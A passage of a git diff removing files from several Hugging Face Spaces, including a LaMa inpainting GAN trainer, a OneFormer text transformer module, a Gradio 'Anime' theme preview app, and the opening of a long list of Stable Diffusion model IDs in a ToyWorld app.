flatten_dict(cur_evaluator_res).items(): - self.log(f'extra_val_{cur_eval_title}_{k}', v) - - def _do_step(self, batch, batch_idx, mode='train', optimizer_idx=None, extra_val_key=None): - if optimizer_idx == 0: # step for generator - set_requires_grad(self.generator, True) - set_requires_grad(self.discriminator, False) - elif optimizer_idx == 1: # step for discriminator - set_requires_grad(self.generator, False) - set_requires_grad(self.discriminator, True) - - batch = self(batch) - - total_loss = 0 - metrics = {} - - if optimizer_idx is None or optimizer_idx == 0: # step for generator - total_loss, metrics = self.generator_loss(batch) - - elif optimizer_idx is None or optimizer_idx == 1: # step for discriminator - if self.config.losses.adversarial.weight > 0: - total_loss, metrics = self.discriminator_loss(batch) - - if self.get_ddp_rank() in (None, 0) and (batch_idx % self.visualize_each_iters == 0 or mode == 'test'): - if self.config.losses.adversarial.weight > 0: - if self.store_discr_outputs_for_vis: - with torch.no_grad(): - self.store_discr_outputs(batch) - vis_suffix = f'_{mode}' - if mode == 'extra_val': - vis_suffix += f'_{extra_val_key}' - self.visualizer(self.current_epoch, batch_idx, batch, suffix=vis_suffix) - - metrics_prefix = f'{mode}_' - if mode == 'extra_val': - metrics_prefix += f'{extra_val_key}_' - result = dict(loss=total_loss, log_info=add_prefix_to_keys(metrics, metrics_prefix)) - if mode == 'val': - result['val_evaluator_state'] = self.val_evaluator.process_batch(batch) - elif mode == 'test': - result['test_evaluator_state'] = self.test_evaluator.process_batch(batch) - elif mode == 'extra_val': - result[f'extra_val_{extra_val_key}_evaluator_state'] = self.extra_evaluators[extra_val_key].process_batch(batch) - - return result - - def get_current_generator(self, no_average=False): - if not no_average and not self.training and self.average_generator and self.generator_average is not None: - return self.generator_average - return self.generator - - def forward(self, batch: Dict[str, torch.Tensor]) -> Dict[str, torch.Tensor]: - """Pass data through generator and obtain at least 'predicted_image' and 'inpainted' keys""" - raise NotImplementedError() - - def generator_loss(self, batch) -> Tuple[torch.Tensor, Dict[str, torch.Tensor]]: - raise NotImplementedError() - - def discriminator_loss(self, batch) -> Tuple[torch.Tensor, 
Dict[str, torch.Tensor]]: - raise NotImplementedError() - - def store_discr_outputs(self, batch): - out_size = batch['image'].shape[2:] - discr_real_out, _ = self.discriminator(batch['image']) - discr_fake_out, _ = self.discriminator(batch['predicted_image']) - batch['discr_output_real'] = F.interpolate(discr_real_out, size=out_size, mode='nearest') - batch['discr_output_fake'] = F.interpolate(discr_fake_out, size=out_size, mode='nearest') - batch['discr_output_diff'] = batch['discr_output_real'] - batch['discr_output_fake'] - - def get_ddp_rank(self): - return self.trainer.global_rank if (self.trainer.num_nodes * self.trainer.num_processes) > 1 else None diff --git a/spaces/OpenGVLab/InternGPT/third-party/lama/saicinpainting/training/trainers/__init__.py b/spaces/OpenGVLab/InternGPT/third-party/lama/saicinpainting/training/trainers/__init__.py deleted file mode 100644 index c59241f553efe4e2dd6b198e2e5656a2b1488857..0000000000000000000000000000000000000000 --- a/spaces/OpenGVLab/InternGPT/third-party/lama/saicinpainting/training/trainers/__init__.py +++ /dev/null @@ -1,30 +0,0 @@ -import logging -import torch -from saicinpainting.training.trainers.default import DefaultInpaintingTrainingModule - - -def get_training_model_class(kind): - if kind == 'default': - return DefaultInpaintingTrainingModule - - raise ValueError(f'Unknown trainer module {kind}') - - -def make_training_model(config): - kind = config.training_model.kind - kwargs = dict(config.training_model) - kwargs.pop('kind') - kwargs['use_ddp'] = config.trainer.kwargs.get('accelerator', None) == 'ddp' - - logging.info(f'Make training model {kind}') - - cls = get_training_model_class(kind) - return cls(config, **kwargs) - - -def load_checkpoint(train_config, path, map_location='cuda', strict=True): - model: torch.nn.Module = make_training_model(train_config) - state = torch.load(path, map_location=map_location) - model.load_state_dict(state['state_dict'], strict=strict) - model.on_load_checkpoint(state) - return model diff --git a/spaces/OptimalScale/Robin-33b/lmflow/version.py b/spaces/OptimalScale/Robin-33b/lmflow/version.py deleted file mode 100644 index b3c06d488393abb3b3829e5590d42409c995b4cf..0000000000000000000000000000000000000000 --- a/spaces/OptimalScale/Robin-33b/lmflow/version.py +++ /dev/null @@ -1 +0,0 @@ -__version__ = "0.0.1" \ No newline at end of file diff --git a/spaces/OtmanSarrhini/foodvision_mini/README.md b/spaces/OtmanSarrhini/foodvision_mini/README.md deleted file mode 100644 index 157c965b94dc10d7791c34f10010baf15be2891a..0000000000000000000000000000000000000000 --- a/spaces/OtmanSarrhini/foodvision_mini/README.md +++ /dev/null @@ -1,13 +0,0 @@ ---- -title: Foodvision Mini -emoji: 🏃 -colorFrom: pink -colorTo: yellow -sdk: gradio -sdk_version: 3.16.2 -app_file: app.py -pinned: false -license: other ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/PAIR/PAIR-Diffusion/annotator/OneFormer/oneformer/modeling/transformer_decoder/text_transformer.py b/spaces/PAIR/PAIR-Diffusion/annotator/OneFormer/oneformer/modeling/transformer_decoder/text_transformer.py deleted file mode 100644 index d0b7292018ecfbf4111c0da9c90444d0e1e41cb6..0000000000000000000000000000000000000000 --- a/spaces/PAIR/PAIR-Diffusion/annotator/OneFormer/oneformer/modeling/transformer_decoder/text_transformer.py +++ /dev/null @@ -1,257 +0,0 @@ -# ------------------------------------------------------------------------- -# MIT License -# -# Copyright (c) 2021 OpenAI -# -# 
Permission is hereby granted, free of charge, to any person obtaining a copy -# of this software and associated documentation files (the "Software"), to deal -# in the Software without restriction, including without limitation the rights -# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell -# copies of the Software, and to permit persons to whom the Software is -# furnished to do so, subject to the following conditions: -# -# The above copyright notice and this permission notice shall be included in all -# copies or substantial portions of the Software. -# -# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR -# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, -# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE -# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER -# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, -# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE -# SOFTWARE. -# -# ------------------------------------------------------------------------- - -import torch -import torch.utils.checkpoint as checkpoint -from torch import nn -from collections import OrderedDict -from timm.models.layers import trunc_normal_ - -class Attention(nn.Module): - def __init__(self, dim, num_heads=8, qkv_bias=False, qk_scale=None, attn_drop=0., proj_drop=0.): - super().__init__() - self.num_heads = num_heads - head_dim = dim // num_heads - # NOTE scale factor was wrong in my original version, can set manually to be compat with prev weights - self.scale = qk_scale or head_dim ** -0.5 - - self.q_proj = nn.Linear(dim, dim, bias=qkv_bias) - self.k_proj = nn.Linear(dim, dim, bias=qkv_bias) - self.v_proj = nn.Linear(dim, dim, bias=qkv_bias) - - - self.attn_drop = nn.Dropout(attn_drop) - self.proj = nn.Linear(dim, dim) - self.proj_drop = nn.Dropout(proj_drop) - - def forward(self, q, k, v): - B, N, C = q.shape - assert k.shape == v.shape - B, M, C = k.shape - q = self.q_proj(q).reshape(B, N, self.num_heads, C // self.num_heads) - k = self.k_proj(k).reshape(B, M, self.num_heads, C // self.num_heads) - v = self.v_proj(v).reshape(B, M, self.num_heads, C // self.num_heads) - - attn = torch.einsum('bnkc,bmkc->bknm', q, k) * self.scale - - attn = attn.softmax(dim=-1) - - x = torch.einsum('bknm,bmkc->bnkc', attn, v).reshape(B, N, C) - - x = self.proj(x) - x = self.proj_drop(x) - return x - -class TransformerDecoderLayer(nn.Module): - def __init__( - self, - d_model, - nhead, - dropout=0.1, - ): - super().__init__() - self.self_attn = Attention(d_model, nhead, proj_drop=dropout) - self.cross_attn = Attention(d_model, nhead, proj_drop=dropout) - - self.norm1 = nn.LayerNorm(d_model) - self.norm2 = nn.LayerNorm(d_model) - self.norm3 = nn.LayerNorm(d_model) - self.dropout = nn.Dropout(dropout) - - self.mlp = nn.Sequential( - nn.Linear(d_model, d_model * 4), - nn.GELU(), - nn.Dropout(dropout), - nn.Linear(d_model * 4, d_model) - ) - - def forward(self, x, mem): - q = k = v = self.norm1(x) - x = x + self.self_attn(q, k, v) - q = self.norm2(x) - x = x + self.cross_attn(q, mem, mem) - x = x + self.dropout(self.mlp(self.norm3(x))) - return x - - -class ContextDecoder(nn.Module): - def __init__(self, - transformer_width=256, - transformer_heads=4, - transformer_layers=6, - visual_dim=1024, - dropout=0.1, - **kwargs): - super().__init__() - - self.memory_proj = nn.Sequential( - nn.LayerNorm(visual_dim), - nn.Linear(visual_dim, transformer_width), - 
nn.LayerNorm(transformer_width), - ) - - self.text_proj = nn.Sequential( - nn.LayerNorm(visual_dim), - nn.Linear(visual_dim, transformer_width), - ) - - self.decoder = nn.ModuleList([ - TransformerDecoderLayer(transformer_width, transformer_heads, dropout) for _ in range(transformer_layers) - ]) - - self.out_proj = nn.Sequential( - nn.LayerNorm(transformer_width), - nn.Linear(transformer_width, visual_dim) - ) - - self.apply(self._init_weights) - - def _init_weights(self, m): - if isinstance(m, nn.Linear): - trunc_normal_(m.weight, std=.02) - if isinstance(m, nn.Linear) and m.bias is not None: - nn.init.constant_(m.bias, 0) - elif isinstance(m, nn.LayerNorm): - nn.init.constant_(m.bias, 0) - nn.init.constant_(m.weight, 1.0) - - - def forward(self, text, visual): - B, N, C = visual.shape - visual = self.memory_proj(visual) - x = self.text_proj(text) - - for layer in self.decoder: - x = layer(x, visual) - - return self.out_proj(x) - - -class QuickGELU(nn.Module): - - def forward(self, x: torch.Tensor): - return x * torch.sigmoid(1.702 * x) - - -class ResidualAttentionBlock(nn.Module): - - def __init__(self, d_model: int, n_head: int, attn_mask: torch.Tensor = None): - super().__init__() - - self.attn = nn.MultiheadAttention(d_model, n_head) - self.ln_1 = nn.LayerNorm(d_model) - self.mlp = nn.Sequential( - OrderedDict([('c_fc', nn.Linear(d_model, d_model * 4)), ('gelu', QuickGELU()), - ('c_proj', nn.Linear(d_model * 4, d_model))])) - self.ln_2 = nn.LayerNorm(d_model) - self.attn_mask = attn_mask - - def attention(self, x: torch.Tensor, key_padding_mask: torch.Tensor): - self.attn_mask = self.attn_mask.to(dtype=x.dtype, device=x.device) if self.attn_mask is not None else None - return self.attn(x, x, x, need_weights=False, attn_mask=self.attn_mask, key_padding_mask=key_padding_mask)[0] - - def forward(self, x: torch.Tensor, key_padding_mask=None): - x = x + self.attention(self.ln_1(x), key_padding_mask=key_padding_mask) - x = x + self.mlp(self.ln_2(x)) - return x - -class Transformer(nn.Module): - - def __init__(self, width: int, layers: int, heads: int, attn_mask: torch.Tensor = None, use_checkpoint=False): - super().__init__() - self.width = width - self.layers = layers - self.resblocks = nn.Sequential(*[ResidualAttentionBlock(width, heads, attn_mask) for _ in range(layers)]) - proj_std = (self.width**-0.5) * ((2 * self.layers)**-0.5) - attn_std = self.width**-0.5 - fc_std = (2 * self.width)**-0.5 - for block in self.resblocks: - nn.init.normal_(block.attn.in_proj_weight, std=attn_std) - nn.init.normal_(block.attn.out_proj.weight, std=proj_std) - nn.init.normal_(block.mlp.c_fc.weight, std=fc_std) - nn.init.normal_(block.mlp.c_proj.weight, std=proj_std) - - self.use_checkpoint = use_checkpoint - - def forward(self, x: torch.Tensor): - for resblock in self.resblocks: - if self.use_checkpoint: - x = checkpoint.checkpoint(resblock, x) - else: - x = resblock(x) - return x - - -class TextTransformer(nn.Module): - - def __init__( - self, - context_length: int, - width: int, - layers: int, - vocab_size, - use_checkpoint=False, - ): - - super().__init__() - heads = width // 64 - self.context_length = context_length - self.width = width - self.transformer = Transformer( - width=width, - layers=layers, - heads=heads, - attn_mask=self.build_attention_mask(), - use_checkpoint=use_checkpoint) - - self.positional_embedding = nn.Parameter(torch.empty(self.context_length, width)) - self.ln_final = nn.LayerNorm(width) - self.token_embedding = nn.Embedding(vocab_size, width) - 
nn.init.normal_(self.token_embedding.weight, std=0.02) - - # initialization - nn.init.normal_(self.positional_embedding, std=0.01) - - def build_attention_mask(self): - # lazily create causal attention mask, with full attention between the vision tokens - # pytorch uses additive attention mask; fill with -inf - mask = torch.empty(self.context_length, self.context_length) - mask.fill_(float('-inf')) - mask.triu_(1) # zero out the lower diagonal - return mask - - def forward(self, text): - x = self.token_embedding(text) - x = x + self.positional_embedding - x = x.permute(1, 0, 2) # NLD -> LND - x = self.transformer(x) - x = x.permute(1, 0, 2) # LND -> NLD - x = self.ln_final(x) - - # x.shape = [batch_size, n_ctx, transformer.width] - # take features from the eot embedding (eot_token is the highest number in each sequence) - x = x[torch.arange(x.shape[0]), text.argmax(dim=-1)] - - return x \ No newline at end of file diff --git a/spaces/ParityError/Anime/app.py b/spaces/ParityError/Anime/app.py deleted file mode 100644 index b92b6e698070d57e2679aad9a4459d062e189d7e..0000000000000000000000000000000000000000 --- a/spaces/ParityError/Anime/app.py +++ /dev/null @@ -1,147 +0,0 @@ -import time - -from theme_dropdown import create_theme_dropdown # noqa: F401 - -import gradio as gr - -dropdown, js = create_theme_dropdown() - -with gr.Blocks(theme='ParityError/Anime') as demo: - with gr.Row().style(equal_height=True): - with gr.Column(scale=10): - gr.Markdown( - """ - # Theme preview: `Anime` - To use this theme, set `theme='ParityError/Anime'` in `gr.Blocks()` or `gr.Interface()`. - You can append an `@` and a semantic version expression, e.g. @>=1.0.0,<2.0.0 to pin to a given version - of this theme. - """ - ) - with gr.Column(scale=3): - with gr.Box(): - dropdown.render() - toggle_dark = gr.Button(value="Toggle Dark").style(full_width=True) - - dropdown.change(None, dropdown, None, _js=js) - toggle_dark.click( - None, - _js=""" - () => { - document.body.classList.toggle('dark'); - document.querySelector('gradio-app').style.backgroundColor = 'var(--neutral-700)' - } - """, - ) - - name = gr.Textbox( - label="Name", - info="Full name, including middle name. No special characters.", - placeholder="John Doe", - value="John Doe", - interactive=True, - ) - - with gr.Row(): - slider1 = gr.Slider(label="Slider 1") - slider2 = gr.Slider(label="Slider 2") - gr.CheckboxGroup(["A", "B", "C"], label="Checkbox Group") - - with gr.Row(): - with gr.Column(variant="panel", scale=1): - gr.Markdown("## Panel 1") - radio = gr.Radio( - ["A", "B", "C"], - label="Radio", - info="Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. 
Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat.", - ) - drop = gr.Dropdown(["Option 1", "Option 2", "Option 3"], show_label=False) - drop_2 = gr.Dropdown( - ["Option A", "Option B", "Option C"], - multiselect=True, - value=["Option A"], - label="Dropdown", - interactive=True, - ) - check = gr.Checkbox(label="Go") - with gr.Column(variant="panel", scale=2): - img = gr.Image( - "https://gradio-static-files.s3.us-west-2.amazonaws.com/header-image.jpg", label="Image" - ).style(height=320) - with gr.Row(): - go_btn = gr.Button("Go", label="Primary Button", variant="primary") - clear_btn = gr.Button( - "Clear", label="Secondary Button", variant="secondary" - ) - - def go(*args): - time.sleep(3) - return "https://gradio-static-files.s3.us-west-2.amazonaws.com/header-image.jpg" - - go_btn.click(go, [radio, drop, drop_2, check, name], img, api_name="go") - - def clear(): - time.sleep(0.2) - return None - - clear_btn.click(clear, None, img) - - with gr.Row(): - btn1 = gr.Button("Button 1").style(size="sm") - btn2 = gr.UploadButton().style(size="sm") - stop_btn = gr.Button("Stop", label="Stop Button", variant="stop").style( - size="sm" - ) - - with gr.Row(): - gr.Dataframe(value=[[1, 2, 3], [4, 5, 6], [7, 8, 9]], label="Dataframe") - gr.JSON( - value={"a": 1, "b": 2, "c": {"test": "a", "test2": [1, 2, 3]}}, label="JSON" - ) - gr.Label(value={"cat": 0.7, "dog": 0.2, "fish": 0.1}) - gr.File() - with gr.Row(): - gr.ColorPicker() - gr.Video("https://gradio-static-files.s3.us-west-2.amazonaws.com/world.mp4") - gr.Gallery( - [ - ( - "https://gradio-static-files.s3.us-west-2.amazonaws.com/lion.jpg", - "lion", - ), - ( - "https://gradio-static-files.s3.us-west-2.amazonaws.com/logo.png", - "logo", - ), - ( - "https://gradio-static-files.s3.us-west-2.amazonaws.com/tower.jpg", - "tower", - ), - ] - ).style(height="200px", grid=2) - - with gr.Row(): - with gr.Column(scale=2): - chatbot = gr.Chatbot([("Hello", "Hi")], label="Chatbot") - chat_btn = gr.Button("Add messages") - - def chat(history): - time.sleep(2) - yield [["How are you?", "I am good."]] - - chat_btn.click( - lambda history: history - + [["How are you?", "I am good."]] - + (time.sleep(2) or []), - chatbot, - chatbot, - ) - with gr.Column(scale=1): - with gr.Accordion("Advanced Settings"): - gr.Markdown("Hello") - gr.Number(label="Chatbot control 1") - gr.Number(label="Chatbot control 2") - gr.Number(label="Chatbot control 3") - - -if __name__ == "__main__": - demo.queue().launch() diff --git a/spaces/Pattr/DrumClassification/lilypond-2.24.2/lib/lilypond/2.24.2/ccache/lily/lily.go b/spaces/Pattr/DrumClassification/lilypond-2.24.2/lib/lilypond/2.24.2/ccache/lily/lily.go deleted file mode 100644 index 031c4b8973d79c377e10417f0b8f7f9fe360420e..0000000000000000000000000000000000000000 Binary files a/spaces/Pattr/DrumClassification/lilypond-2.24.2/lib/lilypond/2.24.2/ccache/lily/lily.go and /dev/null differ diff --git a/spaces/PeepDaSlan9/ToyWorld/app.py b/spaces/PeepDaSlan9/ToyWorld/app.py deleted file mode 100644 index be153e50067222ab8fec8c2a8a543e65c5ffd670..0000000000000000000000000000000000000000 --- a/spaces/PeepDaSlan9/ToyWorld/app.py +++ /dev/null @@ -1,1181 +0,0 @@ -import gradio as gr -import os -import sys -from pathlib import Path - -models = [ - "Yntec/Classic", - "Yntec/mistoonAnime2", - "Yntec/DucHaiten-FANCYxFANCY", - "Yntec/3DCute", - "Yntec/AbsoluteRemix", - "Yntec/AbsoluteReality", - "Yntec/epiCRealismVAE", - "Yntec/OpenNijiRemix", - "Yntec/LAMEanime", - "Yntec/potatoMash", - 
"Yntec/epiCPhotoGasm", - "Yntec/lamettaNightly", - "Yntec/RealCartoon3D", - "Yntec/Oiran", - "Yntec/elldrethSVividMix", - "Yntec/3Danimation", - "Yntec/Darkside", #1K - "Yntec/nuipenimix2", #1K - "Yntec/dosmixVAE", #1K - "Yntec/elldrethSLucidMix", #1K - "Yntec/DucHaitenNiji", #1K - "Yntec/Citrus", #1K - "Yntec/SuperCuteRemix", #2K - "Yntec/NaughtyChildren", #3K - "Yntec/edgeOfRealism", #3K - "Yntec/HitenDiffusion", #1K - "Yntec/Splash", #4K - "Yntec/animeSEXTILLION/", #6K - "Yntec/CitrineDreamMix", #1K - "Yntec/animeTEN", #3K - "Yntec/level4", #3K - "Yntec/elldrethsImagination", #2K - "Yntec/BeenYou", #2K - "Yntec/animeTWO", #4K - "Yntec/LehinaModel", #7K - "Yntec/Trending", - "Yntec/aMovieTrend", - "Yntec/aPhotographicTrend", - "Yntec/photoMovieXFinal", - "Yntec/aMovieX/", - "Yntec/GoldenEra", - "Yntec/Hassanim", - "Yntec/3DCuteWave", - "Yntec/ClassicEra", - "Yntec/GoodLife", - "Yntec/DucHaiten-GoldenLife", - "Yntec/BasilRemix", - "Yntec/ReVAnimated768", - "Yntec/lamettaRemix", - "Yntec/lametta", - "Yntec/vividicAnime", - "Yntec/Dreamscape", - "Yntec/NeverEndingDream768", - "Yntec/HassanBlend12", - "Yntec/HassanBlend1512VAE", - "Yntec/REV", - "Yntec/CetusRemix", - "Yntec/Dreamscapes_n_Dragonfire_v2", - "Yntec/Cetus", - "Yntec/RadiantCinemagic", - "Yntec/RadiantVibes", - "Yntec/OpenGenDiffusers", - "Yntec/Dreamlike", - "Yntec/DeliberateRemix", - "Yntec/DreamShaperRemix", - "Yntec/DeliShaper", - "Yntec/dreamlike-photoreal-remix", - "Yntec/epiCVision", - "Yntec/realistic-vision-v12", - "Yntec/MangledMerge3_768", - "Yntec/OpenLexica", - "Yntec/DreamLikeRemix", - "Yntec/humu", - "Linaqruf/animagine-xl", - "nerijs/pixel-art-xl", - "Yntec/MapleSyrup", - "Yntec/WoopWoopRemix", - "Yntec/ArcticFowl", - "Yntec/iComixRemix", - "Yntec/SamaritanDoesArt", - "Yntec/samaritan3dCartoon2MVAE", - "Yntec/CartoonStyleClassic", - "Yntec/CultClassic", - "Yntec/CinemaE", - "Yntec/GalenaVAE", - "Yntec/a-ZovyaRemix", - "Yntec/a-ZovyaRPGV3VAE", - "Yntec/Infinite80s", - "Yntec/a-ZoviaRPGArtistV2VAE", - "Yntec/GameAssetsDigitalUnitsCreationKit", - "Yntec/QToriReloaded", - "Yntec/Toonify2", - "Yntec/LunarLuma", - "Yntec/Lunar", - "Yntec/Chik2", - "Yntec/photoMovieRealistic", - "Yntec/DucHaiten-StyleLikeMeVAE", - "Yntec/InsaneRealisticCVAE", - "Yntec/Noosphere_v3_CVAE", - "Yntec/RealRainbows", - "Yntec/InsaneM3U", - "Yntec/ChildrenStoriesAnime", - "Yntec/theallysMixIV-verisimilar", - "Yntec/DucHaitenAnime768", - "Yntec/RainbowClassicAnime", - "Yntec/DucHaitenClassicAnime768", - "Yntec/Luma", - "Yntec/WesternAnimation", - "Yntec/NeverExisted", - "Yntec/Rainbowsphere", - "Yntec/Ninja-Diffusers", - "Yntec/GOLDFish", - "Yntec/DreamAnything", - "Yntec/Dreamsphere", - "Yntec/Photosphere", - "Yntec/yabalMixTrue25D_v2_VAE", - "dreamlike-art/dreamlike-anime-1.0", - "Yntec/RainbowDreams", - "Yntec/rainbowpatch", - "Yntec/DucHaiten-Retro-Diffusers", - "Yntec/ElldrethsRetroMix_Diffusers", - "Yntec/sexyToons", - "Yntec/photoMovieX/", - "dreamlike-art/dreamlike-photoreal-2.0", - "dreamlike-art/dreamlike-diffusion-1.0", - "Yntec/CuteYuki2", - "Yntec/KIDSILLUSTRATIONS", - "Yntec/COOLKIDSV2", - "Yntec/Pavo-Mix-Diffusers", - "Yntec/RPG_Remix", - "Yntec/OrangeRemix", - "Yntec/PeachMix3", - "Yntec/DucHaitenAIart-beta", - "Yntec/samdoesartsUlt", - "Yntec/NovelAI", - "Yntec/NovelAIRemix", - "Yntec/Hiten", - "AIARTCHAN/AbyssHellHero", - "digiplay/OldFish_fix1.1.997_diffusers", - "digiplay/VoidnoiseCore_R0829", - "digiplay/MGM", - "digiplay/OldFish_v1.1", - "digiplay/AI-infinity-V1-fp16", - "digiplay/wantan25D_prototype", - 
"digiplay/PotoPhotoRealism_v1", - "digiplay/LunarDiffusion_v1.27", - "digiplay/insaneRealistic_v1", - "digiplay/OLDFish_2348_diffusers", - "digiplay/OldFish_v1.1_diffusers_recover", - "digiplay/OldFish_v1.1mix_hello", - "digiplay/OldFish_v1.1_personal_HDmix", - "digiplay/FishMix_v1", - "DucHaiten/DucHaitenDreamWorld", - "digiplay/LemonteaMixPainterly2_v1", - "digiplay/SweetMuse_diffusers", - "digiplay/Realisian_v1", - "Hius/DreamFul-V2", - "digiplay/m3u", #263 - "digiplay/RMHF_2.5D_v2", - "digiplay/FishMix_v1.1", - "stablediffusionapi/icomix-2", - "digiplay/Remedy", - "Hemlok/QuinceMix", - "digiplay/K-main", - "digiplay/LusterMix_v1.5_safetensors", #256 - "digiplay/perfectLewdFantasy_v1.01", - "digiplay/Opiate_v2", - "digiplay/PhotoSomnia_vFinal", - "digiplay/polla_mix_2.5D", - "stablediffusionapi/all-526-animated", - "AstraliteHeart/pony-diffusion", - "stablediffusionapi/chilloutmixsf", - "Masagin/Deliberate", #235 - "DucHaiten/DucHaitenSuperCute", - "stablediffusionapi/all-526", - "theintuitiveye/HARDblend", - "stablediffusionapi/cyberrealistic", - "stablediffusionapi/cusp-of-serenity", - "SG161222/Realistic_Vision_V1.4", - "digiplay/paulEberSRealismMix_v1", - "Ojimi/anime-kawai-diffusion", - "hassanblend/hassanblend1.4", - "digiplay/zodiac_eclipse_DAY1", - "claudfuen/photorealistic-fuen-v1", - "stablediffusionapi/chillout-app-factory", - "DucHaiten/DucHaitenJourney", - "robotjung/SemiRealMix", - "Joeythemonster/anything-midjourney-v-4-1", - "prompthero/midjourney-v4-diffusion", - "prompthero/openjourney-v4", - "x67/shortjourney", - "darkstorm2150/Protogen_v2.2_Official_Release", - "FredZhang7/paint-journey-v2", - "digiplay/PersonaStyleCheckpoint", - "darkstorm2150/Protogen_Infinity_Official_Release", - "PeggyWang/openjourney-v2", - "darkstorm2150/Protogen_x3.4_Official_Release", - "stablediffusionapi/deliberateappfactory", #236 - "digiplay/CrossoverMix_v2", - "stablediffusionapi/spybg", - "stablediffusionapi/dreamshaper-v6", #239 - "stablediffusionapi/the-ally", - "darkstorm2150/Protogen_x5.8_Official_Release", - "coreco/seek.art_MEGA", - "digiplay/BlankCanvas_v1", #07.11 - "digiplay/OnlyAnime_v2.3", - "Korakoe/OpenNiji", - "digiplay/Photon_v1", - "digiplay/Pika_v2", - "digiplay/RealCartoon3D_F16full_v3.1", #254 - "digiplay/realidefmix_3.5VAE", - "digiplay/realmixUnrealjourney_v1", - "digiplay/SyncMix_v1.5", - "digiplay/TWingshadow_v1.2", - "digiplay/V3_by_Hans_Asian", - "digiplay/whatamix_v1", - - "digiplay/2K", #216 - "digiplay/AIGEN_v1.4_diffusers", - "digiplay/asyncsMIX_v2", - "digiplay/BrickAndMortarMix_v2.0_diffusers", #224 - "digiplay/BeautyFool_v1.2VAE_pruned", - "digiplay/breakdomainrealistic_R2333", - "digiplay/CCTV2.5d_v1", #219 - "digiplay/ChikMix_V3", #253 - "stablediffusionapi/chilledremixsazyou-r", #195 - "digiplay/CityEdge_StyleMix_v1.44", - "stablediffusionapi/dalcefopainting2", #199 - "digiplay/EdisonNilMix_v1", #07.10 - "digiplay/DiamondCoalMix_v2_pruned_diffusers", - "digiplay/DreamShaper_7", #259 - "digiplay/elegantEntropy_v1.1", #221 - "digiplay/EtherRealMix_LUX2", - "digiplay/KawaiiRealisticAnimeMix_A0.3", - "digiplay/highQualityCGMIX_v1", - "digiplay/HIMAWARI_v1", - "digiplay/Hodgepodge_v2.1", #217 - "digiplay/illustro1stEdition_illustroV1", #214 - "digiplay/Juggernaut_final", #07.11 - "digiplay/Landscape_PhotoReal_v1", - "digiplay/LuckyStrikeMix0.2Realistic", #07.10 - "digiplay/Matrix_Stellar_VAE_v1", - "digiplay/PrefixRealisticMix_v1", - "digiplay/RealEpicMajicRevolution_v1", #07.11 - "digiplay/ShampooMix_4", #252 - "digiplay/ShowmakerMix_v1", - 
"digiplay/SoapMix2.5D_v1", - "digiplay/ZemiHR_v2_diffusers", - - "Redamancy2299/dreambooth", - "Lykon/DreamShaper", #240 - "trysem/DreamShaper-3.3", - "HusseinHE/hussein-deliberate-1000steps", #237 - "stablediffusionapi/majicmixfantasy", - "stablediffusionapi/majicmixsombre", #247 - "wavymulder/modelshoot", - "digiplay/ChillyMix_v1", #215 - "stablediffusionapi/foto-assisted-diffusion", #197 - "wavymulder/portraitplus", - "stablediffusionapi/chilloutmix-4264", - "stablediffusionapi/product-design", #194 - "kandinsky-community/kandinsky-2-1", #251 - - "digiplay/2.5DSET_diffusers", #227 - "digiplay/2-KWI", #213 - "digiplay/alstroemeriaMix_v1", - "wavymulder/Analog-Diffusion", - "digiplay/AniRealityMix_v1", #257 - "digiplay/ARRealVX1.1", - "digiplay/BadAnime_v1", - "digiplay/BasilKorea_v2", #07.11 - "digiplay/bluePencilRealistic_v01", - "digiplay/bra_v40_diffusers", - "digiplay/Burger_Mix_semiR2Lite", #222 - "digiplay/calicomixreal_v2.0_diffusers", - "digiplay/CampurSari_Gen1", - "digiplay/cocotifacute_v1", #07.10 - "digiplay/cosfMix_v1", #223 - "digiplay/CounterMix_v2", #211 - "digiplay/CuriousMerge2.5D_v5", - "digiplay/dosmix", - "digiplay/epi_2.5Dphotogodess_diffusers", - "stablediffusionapi/droodlyrielv15", - "digiplay/fantexi_v0.7", - "digiplay/fishmix_other_v1", - "digiplay/FormCleansingMix_v1", #228 - "digiplay/FumizukiMix_v1", - "digiplay/helloworld_v3", - "digiplay/HenmixArt_v1", - "digiplay/ISOmix_v3.22", - "digiplay/JF-Cu_v1", - "digiplay/kencanmix_v2.0beta", - "wavymulder/lomo-diffusion", - "stablediffusionapi/majicmixv5", #192 - "digiplay/mecha_musume_vivid_soft", - "digiplay/MiracleMixGlitter_v1", - "digiplay/MixTape_RocknRoll_v3punk_bake_fp16", - "digiplay/NextPhoto_v1", - "digiplay/Noosphere_v3", - "digiplay/nk15_diffusers", #230 - "digiplay/PeachMixsRelistic_R0", #262 - "wavymulder/timeless-diffusion", - "digiplay/WhiteDreamyHillMix_v1", #220 - "digiplay/ya3p_VAE", #258 - - "DucHaiten/DucHaitenAnime", - "DucHaiten/DucHaitenAIart", - "digiplay/BeenYouLiteL11_diffusers", - "Manseo/Colorful-v4.5-Plus", #244 - "Guizmus/SDArt_ChaosAndOrder", - "DucHaiten/DH_ClassicAnime", - "stablediffusionapi/disneypixar", - "johnslegers/epic-diffusion-v1.1", - "emilianJR/epiCRealism", - "johnslegers/epic-diffusion", - "digiplay/endlessMixRenatus_v1.1", #07.10 - "digiplay/fantasticAnime_diffusers", - "stablediffusionapi/ghostmix", - "Duskfallcrew/EpicMix_Realism", - "nitrosocke/Nitro-Diffusion", - "prompthero/openjourney", - "Guizmus/SDArt_something", - "DucHaiten/DucHaiten-StyleLikeMe", - "ddPn08/subtly", #250 - "22h/vintedois-diffusion-v0-1", - - "circulus/sd-anireal-v2.7", - "0xJustin/Dungeons-and-Diffusion", - "Guizmus/SDArt_AliceInDiffusionLand", - "stablediffusionapi/realistic-vision-v20-2047", - "redstonehero/RPG-v5-itr17_A10T", - - "stablediffusionapi/camelliamix25d", - 